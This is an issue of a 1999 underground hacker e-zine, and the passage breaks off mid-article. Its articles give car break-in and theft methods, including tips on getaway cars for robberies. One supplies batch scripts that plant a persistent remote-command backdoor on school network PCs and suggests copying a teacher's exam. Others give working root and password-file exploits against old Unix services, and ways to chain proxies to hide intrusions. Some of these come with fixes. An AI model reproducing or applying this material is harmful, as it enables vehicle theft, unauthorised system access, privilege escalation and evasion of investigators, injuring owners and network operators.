:..:..:..:..:..:..:..:..: ::::::::::::::::::::::::: :::::::: :::::::: :::: ______ ::::: :: °/ | \ :: ::: / | \_ ::::: :::: \\ / \ :::: ::::: \______/ _ \ :: :::: / / ::: :: / ____/ :: :::: _/ /_ :::: ::::: \ / ::::: ::: \ // ::: :::::: \/ :::::: :::: ° :::: :::::::...........::::::: ::::::::::::::::::::::::: :UNDERGROUND::PERIODICAL: ::::::::::::::::::::::::: "We're on the Up and Up" :..:..::..Issue..::..:..: Issue 2 April 1999 :..:..::..Editor.::..:..: Cyborg :.::.::.:.Staff.:.::.::.: Cyborg HitMan CrossFire :.::..Shouts Outs To.::.: G_H fORCE ManiC ZirQaz DemonR Freeman Sunburst Hellbent LordPhaxx :..::..:.Website.:..::..: http://upzine.8m.com :..::..:..E-mail.:..::..: under_p@yahoo.com :.::...Distributors..::.: t245.dccnet.com:95001 http://cyborg.ie.8m.com http://hitman.ie.8m.com http://www.newbiehack.8m.com :..::..Introduction.::..: <*> Welcome to the second and thus latest greatest issue of Underground Periodical. Well, not dead yet, as it seems. The counter on our website indicates that there are about 600 readers. What is needed the most now are file submissions and suggestions on how to improve it. Some people have been complaining that they can't download Up1-00.zip from the website so take note that there is already a few distributors. I urge you to send us something to use, as you will get to plug your site at the end. <*> Due to the high demand we have started up a subscription list. To join it just go to the bottom of our website and enter your e-mail in the dialog box to sign up. Now issues will be e-mailed to you every month. It will appear in digest form as a mailing list only the .zip file will come attached. The list is powered by ListBot so what are you waiting for? Go sign up now. <*> Issue 1 of Up was reviewed by Anti-Social magazine this month in their twelfth issue so download it at http://www.antisocial.cjb.net This is very important, as it will provide the much needed constructive criticism to help improve for next month and beyond. It might also help to spread the URL around for the website so that more people will download the issues thus increasing our fan base. <*> Its readers write Underground Periodical. Without you we the staff, the fancy ascii art, it all means nothing. You are the ones who write the magazine. What we need to get started is submissions, send us in your text files. We accept technical information, philosophy on the state of the scene today, articles on free speech and censorship we are interested in all innovations of computer culture, although we are mostly based on underground stuff. Send your articles in text format to the e-mail address at the top. <*> Tell your friends!!! Tell your pals on mailing lists and IRC channels about the Periodical. We post our existence to a few newsgroups but it just isn't enough. We can't be everywhere at once so advertise us to your greatest mates. If you were doing an e-zine I'd help you out. <*> We'd like to thank any and all people who submitted to Issue 2 or contributed in any way. It is understood that they are automatically included as Shout Outs. Without continued support from the underground community we won't be able to keep Up going. It's your magazine, so help it out a little. Anyway, on with this issue... :..::.:..Contents.:.::..: <*> 1 - Inroduction & Contents : Cyborg <*> 2 - Breaking Into Cars : Franco <*> 3 - Total Control : GPF#2 <*> 4 - Pirate Radio Series : Cyborg <*> 5 - Unix Security Holes : CrossFire <*> 6 - Bouncing your IP : Cyborg <*> 7 - Breaking Accounts : HitMan <*> 8 - Cracking Passwd Files : Cyborg <*> 9 - Meridian Mail Tips : CFish <*> 10 - Letters\Feedback : Readers <*> 11 - Disclaimer & The End : Up Staff :..::..End Of File..::..: :..::..File 2 Of 11.::..: :...Breaking Into Cars..: :..::...By Franco...::..: <*> Breaking into cars for fun, profit as well as for stealing 'em. The purpose of this file is to educate people of the security flaws associated with car related features (alarms, imobilizers, locks, etc). Now let me begin by getting a few things straight. If your the kind of person who's going to do this thinking they're the man when drunk out of their skull, then forget it as you have as much hope as getting away with it as you stand not falling asleep the second you sit in the car, trust me, friends of friends have done this so may times and got nicked so many times that it's not even funny anymore! I'm serious, practice and maturity is an essential!!! There are many approaches to gaining access into a car, but it also depends if your stealing the contents (radio, mobile phone etc.) or stealing the car itself. If you're simply breaking into the car to steal the contents then you've got tons of options. (a) Smashing the window (b) Picking the locks (i) Now this must be the crudest of all methods on gaining access to a car. Use a stone, screwdriver, yourself, or what ever the hell you like. After this it's kind of self explanatory... if stealing the contents. <*>-----------------------------------------------------------------<*> TIP When breaking the glass, a good idea would be to use sticky tape, (preferably carpet tape). This is always a good idea as it quietens the sound of the glass breaking and practically no glass splinters will cover the seat or floor so that when you sit down you don't end up with a bloody arse. <*>-----------------------------------------------------------------<*> (b) Now as there are so many options I'm gonna break it into sections *** Section 1 If you're trying not to damage the lock (to the naked eye) and you just want to steal the contents to freak the owner out well here goes... Approaches... (i) pick set (ii) electric pick gun or (iii) screwdriver and coat hanger (or "Slim Jim") methods. (i) If you're an unskilled bastard with no patience then go past this bit and see (ii) and (iii) The idea behind using a pick set is to turn the various metal slides, which in turn pops the lock pull bit up, (see below for a pitiful diagram). ______ \ / [lock pull bit, the bit that shoots up | | inside the car] | | | | ===================[glass divide] ------------------- -------------------[rubber strip, outside] You can use various types of files, professional ones (a bit fucking expensive!) or make your own. See bottom of page for addresses of suppliers). If making your own then see yet again another pitiful diagram and follow the simple instructions... Materials: Irregular sized paper clip or strips of easily bendable metal (easy to cut is a big advantage). If using the paper clip, bend the paper clip so that it is in a complete straight line and bend one end so that it forms a small hook to help catch the metal slides in the lock. (See diagram below). __ | [the hook in the clip] ______________________| Once you've done this you will be the proud owner of a simple but effective pick, HORAAAAAAA. IN USE: Insert the pick into the lock and attempt to hook it behind one of the moving parts, then with a "SERIOUSLY FIRM" grip, pull the pick towards you using a pair of pliers. The idea being that the force being applied is so great that instead of the pick simply shooting out, its on its way out, manages to slip the moving parts which as you've probably guessed opens the lock. This will take some practice and indeed a great deal of time. Also the chances of you opening the lock are only as good as the build of your pick. If using the bendable metal, get a close up shot from either the internet or a catalog of a professional pick sets. The picture must be a close up, as you need to be able to distinguish and size the various shapes for when it comes to actually making the picks. Simply "copy carve" the picks and there you have it, an inexpensive professional pick set. IN USE: You firstly insert one pick, one that would allow a second to be inserted at the same time and position them so that each makes contact with the moving parts in the lock so that you can apply sufficient leverage and in turn hopefully pop the lock. Before you think you can go fuck if you think I'm gonna spend half an hour drawing another bloody diagram. As this is one of the most skill-demanding approaches, I advise much practice, and don't be discouraged easily. <*>-----------------------------------------------------------------<*> TIP A good way to improve your lock picking skills is to practice them... where? I've always found the scrap yards a fantastic practice site. Simply find yourself a car of your own personal preference and work away at the lock. The beauty is that if you're asked what you're doing you can say you're trying to open the door to get a part from the inside. As well as this, if you have your eye on a particular car you want to steal or break into, you can go the scrap yard and examine its locks in the knowledge that you won't be stopped and that you can't be arrested for doing it either. <*>-----------------------------------------------------------------<*> (ii) This is by far the easiest of ways to open the lock though... but this is the hideous downer, the price, expect to pay upwards of £120. ______________________ | \ | |==^===^====^====\ | ______ |====^====^====^==\ | | /| --| | | / | | | | / | | | | | | [handle] | | | | | | | | | | | | | | |______| | |____________________________| If you're "NOT" like me and can afford one then I recommend one as with the minimalist of practice you can be successful practically every time even when working with many new cars. The basic principal if you don't know, is that the file you insert into the lock vibrates when turning on the gun and in most cases it will temporally unlock the locking mechanism and if your'e quick enough you will be able to open the door before the gun vibrates the lock back to the closed position. Many private detectives and members of the government use them because of the fact that they leave little if any scratch marks and are easy and quick to operate, but they're not too concealed so don't get caught. You try explaining. Or if you want the car for a job (off license or post office job). If this is the case your gonna want to have the car looking as inconspicuous as possible, and that means no missing windows and no wierd looking locks. First off a good idea is to get something reliable (trust me it may see stupid, but so many jobs have gone arse ways when the getaway car conks out on them), remember, a getaway car is as essential to the job as your dick is for fucking with! Volkswagons and Mercedes are among the best, though if getting one, get an oldish one, (4-8 years, no flash GTI or E-500s. The way in which you would go about opening the lock would in many cases be the pick or screwdriver approach, (see afore mentioned sections). Near the end of the page is a list of cars (with methods) which are simple to pick open and steal, (iii) At this point your probably wondering where my mention about the humble Slim Jim is. Well, wait no longer for I have prevailed. The Slim Jim (of American origin) has been around for countless years, okay fine 30-40 years in one form or another (i.e. coat hanger). The Slim Jim is really an ore refined rich man's coat hanger, though the coat hanger has one undeniable advantage that it can be bent away so you don't have to wear a long trench coat. If anyone knows or has details about a fold away Slim Jim then please e-mail me at crops@indigo.ie or at potmand@hotmail.com. The basic principal behind them is very crude and measures to hamper their uses by manufacturers are now commonplace in cars under 3-4 years old (depends on the manufacturer... well duhh!!!). Back to the point, the principal is that the hook or catch part when inserted between the window and rubber seal and pushed down far enough, is that it latches on to the pop up lock cord and usually with an upward movement "pops the lock" and voila. Recently, re-enforced Jims have been made to cope with motor corps such as Ford and G.M. to help counteract their counter actions (try saying that 15 times with 10 sour balls in your mouth). The screwdruver approach is really easy and with practice can be used to open locks whilst leaving behind little external damage (perfect for the careful car thief). The idea is again quite simple... all that has to be done is that you get a set of screwdrivers, (don't go buying the most expensive though don't buy ones which will bend easily) pick out one you think best for the lock and shove it in and turn. Like I said, extremely easy. Its always a good idea to use a screwdriver which has a longish screw bit which is also thin so that you can get some depth when working on the lock. *** Section 2 If you don't care a toss about the appearance of the car then do what the hell you like to open the door. What more were you expecting? Approaches... (i) easy to steal cars (ii) locksmith contacts <*>-----------------------------------------------------------------<*> TIP A good way of gaining entry to a car is through the boot lock, reason being is that especially on oldish and old cars, the manufacturers use lesser locks and therefore make it very easy for thieving. I've used kitchen knives on these locks before and 75% of the time I've got in. This is one of the easiest methods of getting into cars! <*>-----------------------------------------------------------------<*> (i) Cars which are easy to steal... Morris Minor (any type), opens with an ordinary ford key (15-20 years) or house key. Fiats (ages 12-25) opens again by a similar approach. Fords (aged 10-25) opens with a Ford key of the period, or a similar key. Volkswagons aren't reputed for being easy to steal, the new ones anyway, but I feel I have to give them a mention because they are by far more reliable and start in every weather condition time and time again and are ideal. Volks (aged 7-82) open with the simple screwdriver approach best. Remember, don't damage the lock externally if on a job. My preference would be a Golf. (ii) Contacts American Locksmith Service P.O. Box 26 Culver City, CA 90230 ALS offers a new and improved Slim Jim that is 30 inches long and 3/4 inches wide, so it will both reach and slip through the new car lock covers (inside the door). Price is $5.75 plus $2.00 postage and handling. Lock Technology Corporation 685 Main St. New Rochelle, NY 10801 LTC offers a cute little tool that will easily remove the lock cylinder without harm to the vehicle, and will allow you to enter and/or start the vehicle. The GMC-40 sells for $56.00 plus $2.00 for postage and handling. Steck MFG Corporation 1319 W. Stewart St. Dayton, OH 45408 For $29.95 one can purchase a complete set of six carbon lockout tools that will open more than 95% of all the cars around. Veehof Supply Box 361 Storm Lake, IO 50588 VS sells tryout keys for most cars (tryout keys are used since there is no one master key for any one make of car, but there are group type masters (a.k.a. tryout keys). Prices average about $20.00 a set. :..::..End Of File..::..: :..::..File 3 Of 11.::..: :.::..Total Control..::.: :..::.:..By GPF#2.:.::..: <*> Total Control - A Project For Your School Network Here I'll tell ya how to get what looks like total control over PCs on a Windows LAN with low security. It can be pretty funny, and can really freak out your friends and stuff! Things you need are: write access to a network drive, and physical access to the target computers. So here's what you do: When you are going in to typing class or whatever, start up notepad, and type in this: @echo off echo Logging in to network drive ..... :start if exist h:\mydir\1.bat goto run goto start :run call h:\mydir\1.bat del h:\mydir\1.bat goto start Instead of "h:\mydir", change it to a server directory that you have write access to. Save the file as c:\target.bat Then add a shortcut in the startup group that runs the command "Start /m c:\target.bat". Then the next day, sit at a different computer, and type the same thing except typing in "2.bat" instead of "1.bat" You can continue on this process until you have all your targets set up. This way, you get individual control over each of the victim machines. Now you have to write the controlling file. It's fairly long so I have typed it out in full here for you. It is only a rough draft so mess about with it as much as you like. <*>--------------------------< Distrib.bat >------------------------<*> @echo off if a%1==a goto noparam if a%2==a goto noparam if %1==/? goto noparam if not exist %1 goto nofile if not exist %2\nul goto nodir set srcfile=%1 set distdir=%2 shift shift :dodist copy %srcfile% %distdir%\%1.bat if a%2==a goto quit shift goto dodist :noparam echo -----====[ Total Control ]====----- echo By GPF#2 echo. echo USAGE: echo distrib file directory number number number .... echo. echo EXAMPLE: echo Distribute cntrl.txt to computers 2, 6, 4, 9, 11, 41, and 21 echo Using n:\log as the directory to write to: echo distrib cntrl.txt n:\log 2 6 4 9 11 40 21 goto quit :nofile echo Error - Input file unfound. Type distrib /? for usage goto quit :nodir echo Error - Distribution directory does not exist. echo Type distrib /? for usage goto quit :quit <*>--------------------------< Distrib.bat >------------------------<*> So select all of the text between the markers, and copy it to the your clipboard. Then paste it in to notepad, and save it on to a disk as Distrib.bat . This batch file is the one you will need to run every time you want to control a PC, so take care of it! It gives you some info on how to use it if you type distrib /? . If you have followed all the steps in this file, you are nearly finished. What is left now, is to decide what you actually want the other PCs to do, and how to do it. A really simple one is this - 1. Startup Notepad 2. Type in this: echo I CAN SEE YOU>c:\temporary.txt notepad c:\temporary.txt 3. Save the file as c:\IcanCU.txt 4. At the MSDOS prompt type: "a:\distrib.bat c:\IcanCU.txt h:\mydir 1 3 4 5 7" 5. Sit back, and watch the message "I CAN SEE YOU" displayed on target number 1, number 3, 4, 5, and number 7. 6. Don't burst your hole laughing, because they'll know it was you, and you'll be busted! So step 2 is the main work done by your program. This can obviously be customised to do a lot more than just display something in Notepad. Step 4 uses Distrib.bat to send the messages to the server. So instead of "h:\mydir", type the directory that the victims are set to use. Also in step 4, try to use the MSDOS prompt. This will work from the "Run" box on the start menu, but in MSDOS prompt, each command is not recorded. When the messages start appearing onscreen, there will be plenty of distractions for you to smuggle your floppy out of it's drive. Delete the file c:\IcanCU.txt while you are at the DOS prompt also. That's the command "del c:\IcanCU.txt" for all you Win'95 people. Actually, I just thought of something you could do for Step 2: Suppose a teacher was writing your summer test, and was saving it as c:\windows\test.doc in MS Word. You could send their machine the command: copy c:\windows\test.doc h:\mydir This would copy the file to the server, ready for your retrieval! Good luck, and have fun. I did ;-) _____ / ___/ ________ / / _ / \ / /_// E N E R A L /_____ | /____/ |_____\ | _____ / /| / _ / / / / / // / __/__/__ / / / / ___/ R O T E C T I O N / / ________/ / / /_/ __/__/__ / / / _____ / / / ________/ / / ___/ / /|_______|/ / /_ / /_/_____ / _/ A U L T / /| /_/ /___________/ / |___________|/ -----Digital Artist----- -----http://members.xoom.com/GPF2----- -----GPF2@pmail.net----- :..::..End Of File..::..: :..::..File 4 Of 11.::..: :..Pirate Radio Series..: :..::...By Cyborg...::..: <*> Pirate Radio Series Part II Introduction: This file deals with starting your own pirate radio station. It is a part two of a four part series on pirate radio. I've researched many sites on the internet combined with my own knowledge to write this file. Going On The Air - Transmitters One of your most important and difficult investments will be the purchase of a transmitter. You could always build your own... but it is much easier and usually cheaper to purchase a transmitter. There are some safety guidelines that need to be followed when operating a transmitter. When you get your manual you would probably like to just skip the start and get down to some business. This can be lethal. <*>-----------------------------------------------------------------<*> TRANSMITTERS UTILISE LETHAL VOLTAGES! NEVER OPERATE A TRANSMITTER WITH THE SAFETY DEVICES BYPASSED! YOU COULD BE KILLED! RF ENERGY LEAVES A DAMAGING BURN IF YOU MAKE "CONTACT"! TREAT YOUR TRANSMITTER WITH RESPECT AND CAUTION OR IT MAY COST YOU YOUR LIFE! <*>-----------------------------------------------------------------<*> So what is a transmitter and what does it do? A transmitter is a device that converts AC or DC energy to RF energy. By itself, RF energy doesn't do you much good, so a transmitter also requires audio information to "modulate" the RF energy it generates. The modulated RF energy is coupled into an antenna to be dispersed into the ionosphere. Did you get all that? Good. Have you ever heard of a Variable Frequency Oscillator? I didn't think so, it sounds like a device from the Starship Enterprise. This is the next step up from Crystal Control (This means you must supply a crystal cut or ground for a specific frequency to operate on that frequency). A transmitter that comes equipped with a VFO or can use an external VFO gives you freedom to operate on any frequency that it covers and where the transmitter is able to tune up. Most VFO's will cover the ham bands in 500 Khz segments and this can be utilized by the pirate to get outside the ham bands. It also allows for moving your frequency at a moments notice. By now, you might be familiar with some terms that describe types of modulation. Here is a quick guide: * AM = Amplitude Modulation * SSB = Single Side Band * USB = Upper Side Band * LSB = Lower Side Band * DSB = Double Side Band * FM = Frequency Modulation * PM = Phase Modulation AM modulation, a carrier wave determines your frequency and 66% of your transmitter power is used here! The modulating signal, audio info, is used to vary the amplitude of the carrier wave by means of upper and lower side bands. This is where the remaining 33% of the transmitters power goes. The range of audible frequencies to most people is 20 to 20,000 Hertz. In most amateur gear the audio bandwidth is restricted to 300 to 3,000 Hertz. If you wanted to be a real smart guy you could transmit on 2600 Hertz. This range is the best for projecting your voice signal. Now in AM mode combine 2.7 Khz for both upper and lower sidebands and you have an AM signal almost 6 Khz wide. If the frequency response of the transmitter was increased to 10 Khz, the resulting AM signal would be 20 Khz wide! You should now be starting to understand why commercial broadcasting stations reserve a wide berth. Feeding your program audio into your transmitter properly can be a difficult and frustrating challenge! To start with, a Microphone level signal is High in impedance, typically, and quite small electrically. This is what the input circuits of your transmitter are expecting to see when you operate it in a voice mode. Now, the typical output level of a tape deck is Medium in impedance and electrically much higher than a microphone signal. This is where the trouble starts. Ways to tell if you are experiencing problems is that your transmitted signal will be under modulated meaning you are not supplying a large enough signal or the reverse will be true, your transmitted signal will be over modulated meaning it will sound distorted, will be wide, and generally, unlistenable. Take heart that both can be cured and all you need is a little knowledge! What you need is a matching network, more commonly known as a PAD, between your program audio and Mic Input of your transmitter. You must be selective when purchasing your transmitter. Here are some quick tips to help guide you: * Read the fucking manual When buying a transmitter the manuals are essential. Trying to find manuals for older pieces of gear can be a difficult and expensive task. these URLs provide a good stock: http://eigen.net/w7fg/ http://www.sarrio.com/sarrio/rsfinal1.html * Let your smell guide you This may sound odd but stick your face right down into the transmitter, POWER OFF! and take a big whiff! If it smells "burned" it would probably be wise to keep looking at other transmitters. Although you may be so embarrassed from sticking your face in that maybe you should just run out of the store. * Need to know basis Under NO circumstances should you inform the potential seller of a transmitter what you are going to be using it for! Just say something like you are studying for your ham license. I doubt that they would be too interested in tuning into your illegal underground station anyway. Be careful what you say! * Living conditions Make sure you store your transmitter in a cool dry place. The last thing you need is to let it get wet and die from an electric shock. Also, don't let it overheat, again the current of electricity has no pity on you. - Antennas Antennas are probably one of the most debated, most studied and cause for the most confusion of any field in radio. The antenna is the most important part of your station if properly constructed. For instance: Transmitter A runs 100 watts to a improper antenna and gets heard only marginally. Transmitter B runs 10 watts to a properly constructed, resonant antenna and gets heard much better and louder than Transmitter A. The quality of your antenna is a prediction of the quality of your whole station. It is crucial to have it in working order. Perhaps the easiest and most popular antenna is a Dipole. The dipole antenna is easily constructed, almost impossible to mess up and works well at almost any height above ground. For the beginner, this is the antenna to use. For your antenna to work well, you need to determine the frequency you are going to operate on. For example, we'll say 7445 Khz. To determine the length of wire our dipole antenna will need, we use the following formula: 468 divided by Frequency in Megahertz = Length in Feet. So, working the math, 468 / 7.445 = 62.86 Feet. Round that off and we come to 62 Feet 10 Inches. This is the total length of the antenna. To make a dipole, cut two wires, each one 31 Feet 5 Inches long. While not absolutely necessary, a Balun is recommended. For Dipole antennas that are fed with Coax line, a 1 to 1 Balun is suggested. A Balun matches a BALanced Line (uour Dipole) to an UNbalanced Line (Your Coax). This makes for an even greater transfer of power from the feedline to the antenna and will also prevent the ground shield of your Coax from becoming a radiator of RF! Baluns are a complex and difficult subject to fathom but there are books out that explain the How To's better than I could. Just remember, A Balun is optional but is worth the trouble and not that expensive to install one. Another question you might be asking "How high should I try to get my dipole?" My answer: as high as possible. If you live near hills or mountains then maybe you can set it up concealed next to a weather station. If that isn't possible then at least running up the side of your house or apartment block. The higher, the better. Dipoles typically have the most favorable radiation patterns when they are 1 wavelength above ground. In the case of our 40 Meter Dipole, that comes to a whopping 125 Feet! I think it's safe to say that 99.99% of all 40 Meter Dipoles erected do not reach these heights. The last consideration you need to think about is that of antenna orientation. A dipole will radiate the majority of power in lobes that are perpendicular to the axis of the dipole. What this means is, if you run your dipole North to South, then the majority of your RF signal will be radiated in a East to West pattern. So depending on your geographical location of your transmitter and the location of your listeners will depend on how you orient your antenna. You may also find that there is only one or two possible ways to place your dipole on your property, don't sweat it. Just hang it up and off you go Look out for Part III of this series where I will discuss operating tips and sharing the air with other radio people. Well I hope this has been an informative read. If you would like to e-mail me regarding anything in this file then go ahead. If you are interested in hacking, phreaking or programming then e-mail me or visit my website: cyborg@disinfo.net http://cyborg.ie.8m.com :..::..End Of File..::..: :..::..File 5 Of 11.::..: :..Unix Security Holes..: :.::...By CrossFire..::.: <*> Introduction ---------------- Ok, for like a year now I have been going on about ethical hacking, and being the person fighting back and shit like that, so now, I have decided to write something about Unix Security Holes, how they work, and how to fix them. Please note, this intended as an article on how to fix security holes, not as a cookbook for budding uebercrackers. The Famous PHF Hole ------------------- The PHF hole is about the most well known security hole in the universe, although now you will be hard pushed to find a server that is vulnerable. This hole works because of the file phf.cgi that is in the cgi- bin directory of the apache web server. The basic function of phf.cgi is to let a remote user execute arbitary commands on the server machine, the most common of these is to view the password file. How to use this hole To test if your machine is vulnerable to this hole, go into a web browser and in the location bar type: http://www.yourdomain.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd If you are vulnerable to this hole, you will see something like: root:2fkbNba29uWys:0:1:Operator:/:/bin/csh www-admin:rYsKMjnvRppro:100:11:WWW admin:/home/Common/WWW:/bin/csh Otherwise you will see an error message saying that phf.cgi was not found on the server, or you don't have permission to view phf.cgi on this server. How to fix this hole This is the obvious part, off the top of my head, I can think of 2 ways to fix this on your server, these are: rm phf.cgi, or while root, chmod 700 /cgi-bin/phf.cgi (you must be in the root dir of the server to do this). The Deadletter Exploit ---------------------- Deadletter Exploit for Sendmail 8.8.4 Version affected: 8.8.4 Ok, here's a brief and interesting explonation of this famous exploit. This exploit uses sendmail version 8.8.4 and it requires that you have a shell acount on the server in question. The exploit creates a link from /etc/passwd to /var/tmp/dead.letter Very simple really. Here's how it works, below are the exact commands as you have to type them. ln /etc/passwd /var/tmp/dead.letter telnet target.host 25 helo mail from: frostiez@bah-bah.net rcpt to: masterbah@hotmail.com data frostiez::0:0:Mr Frostiez:/root:/bin/bash . quit Then, when you're done, telnet to port 23 and log in as frostiez, no password required. Thanx to a little bit of work we did, frostiez just happens to have the same priviledges as root. There are a couple of reasons why this might not work: 1) /var and / are different partitions (as you already know, you can't make hard links between different partitions). 2) There is a postmaster account on a machine or mail alias, in which case, your mail will end up there instead of being written to an /etc/passwd. 3) /var/tmp doesn't exist or isn't publicly writable. How to fix this Hole Login as root at your system, then cd /var/tmp ls -l If there is a dead letter already, you are safe. Don't delete that one. If there NO dead.letter, type: touch dead.letter chmod 600 dead.letter This will create a dead.letter of null length. Now it is impossible to hardlink /etc/passwd against /var/tmp/dead.letter. This exploit will not work any more. AnswerBook2 Exploit - Solaris Only ---------------------------------- This exploit was blatantly nicked from a sun security list, and is in letter form. Hello, already in December 1997 I discovered a serious bug in the AnswerBook2 server dwhttpd/3.1a4 that ships with Solaris 2.6 (server edition). With a simple socket connection to the AB2 port (default: 8888), *anyone* on the network with access to that port (default: everybody, see below) can bring the server to spin and deny further responses: - --- snip --- HTTP/1.0 500 Server Error Server: dwhttpd/3.1a4 (Inso; sun5) [...] The server currently lacks the resources needed to handle your request. Please try again later. - --- snip --- The affected dwhttpd process will eat one cpu, with possible impact on other services. (MP machines will still have some cpus available.) I reported this to Sun who filed a bug report bug/sherlock/server/4099376 HTTP 1.0 HEAD request brings the dwhttpd to spin and assigned priority "fix within 3 months". AB2 technology is a third-party product, so Sun filed a bug with Inso who provides dwhttpd as part of their DynaWeb toolkit. Five months later (!) now they finally claim: It's fixed in dwhttpd/4.0 which will ship with Solaris 2.7. Still no patch for the existing AB2 package! What you can do: Q: Do I run dwhttpd? A: Check for packages SUNWab2r, SUNWab2s and SUNWab2u. Check if dwhttpd is invoked at system startup (/etc/rc2.d/S96ab2mgr) Check with "ps -ef | grep dwhttpd" Q: Is my AB2 server really vulnerable? A: If you don't believe it, check yourself - the source code for a sample "AB2 DoS attack program" (that I gave Sun to reproduce the bug) is included in the bug report (wow - Sun publishes exploit scripts!). Q: I'm vulnerable - what can I do? A: 1. The only real fix is "/etc/init.d/ab2mgr stop" (which is a DoS itself :) 2. Restrict the access to your AB2 server port to particular clients (e.g. intranet only) by tcp-wrapper or firewall setup. 3. Get nervous, call Sun, request a patch for this bug now. I hope we can get Sun/Inso to produce a *patch* soon. If there are any substantial news I will summarize again. Best regards, Thomas CFingerd Exploit ---------------- (taken from rootshell) SUMMARY ------- I have found out that cfingerd 1.3.2 contains a security hole that could lead to easy root compromise for any user that has an account on the local machine, but only if ALLOW_EXECUTION is set in /etc/cfingerd/cfingerd.conf. By default, this option is DISABLED in Debian GNU/Linux. DETAILS ------- The ALLOW_EXECUTION option permits any user on the system to execute a program when their username is fingered. cfingerd needs to run as root but doesn't properly throw away root permissions when it starts up the user's script. When it is told to invoke /usr/bin/id from a user's script, it produces: uid=0(root) gid=0(root) euid=65534(nobody) groups=0(root) EXPLOIT ------- Have it exec this: void main(void) { setreuid(0, 0); system("/usr/bin/id"); } Of course, system can exec any more devious command you chose -- ie, marking a shell setuid root, etc. (Can also be done with C calls.) No, I am NOT going to tell you how to make a setuid shell. If you don't know, you shouldn't be reading this. To test the exploit, put something like this in ~/.project: $exec /home/jgoerzen/test and set the ALLOW_EXECUTION to be enabled. This will give root for everything. Additionally, as you can tell, it fails to relenquish group permissions at all. After applying the below fix, the new output is: uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) Much better! FIX --- Debian GNU/Linux comes with cfingerd, but in its default configuration, it is safe. For maximum security, please install the upgraded packages anyway. cfingerd greater than or equal to 1.3.2-11.0 will have the fix. I have uploaded the fixed packages to Incoming; before they propogate to the mirrors, you may find them at http://happy.cs.twsu.edu/~jgoerzen/cfingerd/ along with the new sources. 374531a02be81021ca9a12059a3c4515 cfingerd_1.3.2-11.0.diff.gz f8819601f85115c063d5cace970554d6 cfingerd_1.3.2-11.0.dsc 2f943297e0b73fe32345e932f11b6a58 cfingerd_1.3.2-11.0_i386.changes b9df424d723da39aa9c0067171822d56 cfingerd_1.3.2-11.0_i386.deb 4a3403d2519fea6b829bdeda9026c8ad cfingerd_1.3.2-11.0_i386.upload Those of you not using Debian may apply the following diff. --- cfingerd-1.3.2.orig/src/privs.h +++ cfingerd-1.3.2/src/privs.h @@ -29,6 +29,7 @@ #ifndef _USE_BSD #define _USE_BSD 1 #include +#include #undef _USE_BSD #else #include @@ -72,14 +73,20 @@ extern #endif gid_t real_gid, effective_gid; +#ifndef MAIN +extern +#endif +gid_t grouplist[1]; #define RELINQUISH_PRIVS { \ real_uid = getuid(); \ effective_uid = NOBODY_UID; \ real_gid = getgid(); \ effective_gid = NOBODY_GID; \ - setregid(real_gid, effective_gid); \ - setreuid(real_uid, effective_uid); \ + grouplist[0] = effective_gid; \ + setgroups(1, grouplist); \ + setregid(effective_gid, effective_gid); \ + setreuid(effective_uid, effective_uid); \ } #define PRIV_ROOT_START {\ @@ -87,25 +94,29 @@ setregid(effective_gid, real_gid); \ #define PRIV_ROOT_END \ - setregid(real_gid, effective_gid); \ - setreuid(real_uid, effective_uid); \ + setregid(effective_gid, effective_gid); \ + setreuid(effective_uid, effective_uid); \ } #define USER_PRIVS(a,b) {\ - setreuid(real_uid, 0); \ - setregid(real_gid, 0); \ + setreuid(0, 0); \ + setregid(0, 0); \ effective_uid = (a); \ effective_gid = (b); \ - setregid(real_gid, effective_gid); \ - setreuid(real_uid, effective_uid); \ + grouplist[0] = effective_gid; \ + setgroups(1, grouplist); \ + setregid(effective_gid, effective_gid); \ + setreuid(effective_uid, effective_uid); \ } #define NOBODY_PRIVS \ - setreuid(real_uid, 0); \ - setregid(real_gid, 0); \ + setreuid(0, 0); \ + setregid(0, 0); \ effective_uid = NOBODY_UID; \ effective_gid = NOBODY_GID; \ - setreuid(real_uid, effective_uid); \ - setregid(real_gid, effective_gid); + grouplist[0] = NOBODY_GID; \ + setgroups(1, grouplist); \ + setgid(NOBODY_GID); \ + setuid(NOBODY_UID); #endif /* _PRIVS_H_ */ ADDITIONAL CREDIT goes to Jakob Bohm Jensen . He reported some other things (not these in particular) that didn't turn out to be a hole but lead me to examine the code carefully. John Goerzen Linux, consulting & programming jgoerzen@complete.org | Developer, Debian GNU/Linux (Free powerful OS upgrade) www.debian.org | +---------------------------------------------------------------------+ Visit the Air Capital Linux Users Group on the web at: http://www.aclug.org Conclusion ---------- I Hope this article has enlightened you to certain security holes and how to fix them, for further info on security holes, check out www.rootshell.com or www.geek-girl.org/bugtraq. XFire crossfire@hackers-uk.freeserve.co.uk :..::..End Of File..::..: :..::..File 6 Of 11.::..: :.:..Bouncing Your IP.:.: :..::...By Cyborg...::..: <*> Introduction: This file deals with bouncing your connection through servers. It also meant to clear up some misconceptions about your privacy whilst on the internet. *** Introduction To Bouncing We all desire anonymity to a certain extent. Just exploring the internet through your regular account is no fun. Internet Protocol is your address when online. Whenever you send an e-mail, post to a newsgroup, join an IRC channel even access a website you are being tracked. Many people are paranoid about cookies. They are stored on your computer so that websites don't need you to re-enter information. I have also read many people say it is stupid to delete them. That is bullshit. I delete cookies, not because I think the US government are tracking me but because I know that encrypted passwords are often stored in cookies and if anyone could get hold of these then they might be able to gain access to my accounts. Please do not confuse bouncing with spoofing. IP spoofing is the art of hiding a connection behind packets that seem to come from some arbitrary source. IP bouncing is the art of re-routing your IP through somebody else's open connection. We're not going to be hiding behind packets so there will be logs and records kept on the computer you are bouncing to. Remember that you aren't truly safe unless you are spoofing from a guest account on a laptop connected to an out of country analogue cell phone whilst journeying on a train cross country at rapid speeds. Anything short of that requires caution and obscurity. The advantages to bouncing are many. Besides hiding your identity when hacking (or attempting to hack) it can also be a benefit to the general public as nuke protection, trojan protection. It is comfortable to know that you are enclosed, but beware, you aren't untouchable. *** Proxy Server Bouncing Ok, we know that proxies keep logs, so hacking from one wouldn't be a very smart idea. However what if you went through more than one? Go to telnet. If you are on Unix type telnet and press enter. If you are on Windows double-click telnet.exe in the Windows installed directory. Now connect to the proxy e.g. proxy.compuserve.com on the port it is operating. Most proxy machines operate on port 8080 but not always. Then connect yourself through telnet to another proxy, then another and so on. Now when a distraught victim finds someone has been in their box they'll will contact the sysadmin of the proxy requesting logs. Then when they figure out that its another proxy they will have to contact another sysadmin. Now, many sysadmins aren't willing to e-mail their logs simply because somebody said they were hacked, and many will have deleted their recent logs by the 